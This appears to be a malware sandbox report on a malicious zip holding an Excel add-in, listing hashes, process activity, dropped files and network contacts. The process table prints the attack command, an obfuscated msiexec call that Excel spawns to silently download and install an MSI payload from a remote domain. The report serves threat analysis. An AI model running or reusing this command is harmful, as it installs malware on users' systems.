| Field | Value |
|---|---|
| File name | 9bb6656ef5b2d47ecaf0.zip |
| Full analysis | https://app.any.run/tasks/8765d281-57cf-4005-a05f-20c84f52bae5 |
| Verdict | Malicious activity |
| Analysis date | October 09, 2019, 16:45:50 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | C6D8A7DDDE85B182605F1D727A87262D |
| SHA1 | DC8D8A1D8D47BAB0C8E9419B7D6A6F944883033D |
| SHA256 | 52E6C54B31807659B3515986BECA484A886C7610BEAD6403C1270C28827D962D |
| SSDEEP | 384:mgCrPfhivZya/PiKIXn4cmA2QO04+ZRAjV7K:mIn3iJ34s9RZRAjc |
| Extension | File type (score) |
|---|---|
| .zip | ZIP compressed archive (100) |

| ZIP field | Value |
|---|---|
| ZipRequiredVersion | 788 |
| ZipBitFlag | 0x0001 |
| ZipCompression | Deflated |
| ZipModifyDate | 2019:10:09 16:44:26 |
| ZipCRC | 0xf1e14ef0 |
| ZipCompressedSize | 13356 |
| ZipUncompressedSize | 15740 |
| ZipFileName | 9bb6656ef5b2d47ecaf0c7fc549be27e7cebd2966c69f687177a5397fa7b3894.bin |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 384 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\9bb6656ef5b2d47ecaf0.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
| 3176 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
| 3392 | "C:\Windows\System32\cmd.exe" /c mSIe^X^eC /i https://paragonhospital.ug/wp-content/uploads/2019/09/office/invoice-31299-pdf.msi /qn | C:\Windows\System32\cmd.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1619; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 1504 | mSIeXeC /i https://paragonhospital.ug/wp-content/uploads/2019/09/office/invoice-31299-pdf.msi /qn | C:\Windows\system32\msiexec.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Exit code: 1619; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
| 3204 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | — | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 384 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb384.8785\9bb6656ef5b2d47ecaf0c7fc549be27e7cebd2966c69f687177a5397fa7b3894.bin | — | — | — |
| 3176 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA450.tmp.cvr | — | — | — |
| 3176 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 1C774EF2A2764D39ECA9F5D773245421 | 521D7D96C9C6F9133C993ED4FC77BB14D13578F98905E5AF0C06D3237FB7581C |
| 3176 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\9bb6656ef5b2d47ecaf0c7fc549be27e7cebd2966c69f687177a5397fa7b3894.xlam.LNK | lnk | CCCC8D04E9EB486B610C6E70E305F026 | 487C3C9F6E5B3C99B064132EDC2B487F79C4151D4A45480CC743447E2B1F9373 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3204 | msiexec.exe | 157.230.235.238:443 | paragonhospital.ug | Joao Carlos de Almeida Silveira trading as Bitcanal | US | unknown |

| Domain | IP | Reputation |
|---|---|---|
| paragonhospital.ug | | unknown |